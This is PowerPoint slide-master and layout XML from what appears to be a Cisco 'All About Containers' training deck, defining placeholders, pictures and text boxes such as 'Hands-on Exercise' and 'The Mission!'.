            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDCF34CE-2DE1-FF41-896D-B3AE883AA20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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F5E16A-FE9A-BF48-82F5-37C715B12708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04385922-5475-094F-9F97-8FF196EC427E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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802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CC Mission Brea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85D8A5-BEA8-B048-B62D-A3F9AD8EB32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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C1B048-465C-4442-B509-10E275175B9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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1E7E6FD-2281-B941-85E4-12DD2303285B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="715581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4050" b="0" i="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Exercise …</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74F15EBC-0A3B-384C-A318-FE4463EE58C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56114" y="1597039"/>
            <a:ext cx="4073237" cy="2703601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DEDB633-A1FF-7F4B-A878-34195CDBC71A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E53DEB9B-42CD-A146-A7D8-61B35C1EC108}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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982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C Mission Brea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85D8A5-BEA8-B048-B62D-A3F9AD8EB32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9109363" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359C5C59-6138-724F-B9E0-D0012D741103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="239986"/>
            <a:ext cx="7179823" cy="1269578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Get your hands dirty with …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4050" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Mission!</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98714426-CE39-E844-A586-4769F10EA22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1297007"/>
            <a:ext cx="2409443" cy="2531836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C1B048-465C-4442-B509-10E275175B9B}"/>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17230" y="3959641"/>
            <a:ext cx="1574983" cy="1072618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1797E92-5125-EF40-8EF0-150B9A4EA100}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6648913" y="4778344"/>
            <a:ext cx="2207942" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ALL ABOUT CONTAINERS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FAD7406-5BA6-954A-B3D2-A570C59105CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6707458" y="4772813"/>
            <a:ext cx="182322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5479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60">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="7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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287923" y="1540552"/>
            <a:ext cx="7972248" cy="2278837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="183596" indent="-399958" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="1" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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2871300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60">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="22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Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287923" y="1540552"/>
            <a:ext cx="7972248" cy="2278837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="183596" indent="-399958" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="4000" b="0" i="1" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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2105233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347788"/>
            <a:ext cx="8115300"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13023626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p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500064" y="3911436"/>
            <a:ext cx="8139112" cy="525016"/>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bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251878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2"/>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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448786" y="3054518"/>
            <a:ext cx="8364236" cy="560153"/>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a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388151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416798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1"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5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3466792"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2018  Cisco and/or its affiliates. All rights reserved.   Cisco Public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="308012" y="240632"/>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861127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594" indent="-171446">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189" indent="-165096">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783" indent="-109535">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="911012" indent="-171411">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1082423" indent="-168236">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21399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13475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1_Bullet_with_Code">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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755866" y="1205898"/>
            <a:ext cx="3886200" cy="3083094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="45710" rIns="0" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="57149" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="174621" indent="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="288918" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="403215" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="517512" indent="0">
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enter Code</a:t>
            </a:r>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67334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51366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28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347789"/>
            <a:ext cx="8115300"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437768" y="4148221"/>
            <a:ext cx="7180312" cy="326233"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="603560">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Edit Master text styles</a:t>
            </a:r>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12493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8"/>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82842385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9"/>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437768" y="4148221"/>
            <a:ext cx="7180312" cy="326233"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="603560">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Edit Master text styles</a:t>
            </a:r>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49797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9"/>
            <a:ext cx="8280057" cy="3073946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="285683" marR="0" indent="-285683" algn="ctr" defTabSz="457094"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US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4"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25605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1_Half_Page_Blank">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462301" y="1665183"/>
            <a:ext cx="3662024" cy="2925868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="174621" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1110"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="288918" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="403215" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="517512" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="631809" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1200" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>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7" y="341314"/>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200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3568392"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4004039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2_Half_Page_Text">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3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="419101" y="1657350"/>
            <a:ext cx="3827463" cy="18288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5097464" y="531812"/>
